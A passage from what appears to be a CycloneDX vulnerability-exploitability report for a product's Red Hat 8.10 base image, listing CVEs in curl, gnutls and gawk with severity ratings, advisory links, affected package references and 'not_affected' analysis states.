      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3832",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        179
      ],
      "description": "A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3832"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20612"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20613"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26319"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26409"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:29197"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3832"
        },
        {
          "url": "https://bugzilla.redhat.com/2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445762"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467441"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467451"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467678"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467686"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33845"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33846"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3832"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3833"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42009"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42015"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5260"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5419"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-20613.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20612"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/issues/1801"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3832.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50346.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3832"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8284-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3832"
        },
        {
          "url": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2026-04-29-12"
        }
      ],
      "published": "2026-04-30T18:16:30+00:00",
      "updated": "2026-07-13T17:17:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.16-8.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40467",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Use After Free vulnerability has been found in \"io.c\" program file of gawk (do_getline_redir() routine). This issue may lead to a crash. It affects\u00a0gawk in versions 5.4.0 and below.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40467"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40467"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-40467"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gawk.git/commit/?id=a2d18c74109e41bec29a23098eba2e00057286d8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40467"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8588-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40467"
        }
      ],
      "published": "2026-07-13T13:16:36+00:00",
      "updated": "2026-07-14T01:13:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40468",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability has been found in \"builtin.c\" program file of gawk. This issue may lead to memory exhaustion on the hosting operating system and could be used to overwrite gawk heap metadata and objects with attacker-controlled bytes. It affects\u00a0gawk in versions 5.4.0 and below.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40468"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40468"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-40467"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gawk.git/commit/?id=062f2f2581b991362c046f7f2e238ffa34e6f8c7"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40468"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8588-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40468"
        }
      ],
      "published": "2026-07-13T13:16:36+00:00",
      "updated": "2026-07-14T01:12:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.2.1-4.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gawk@4.2.1-4.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
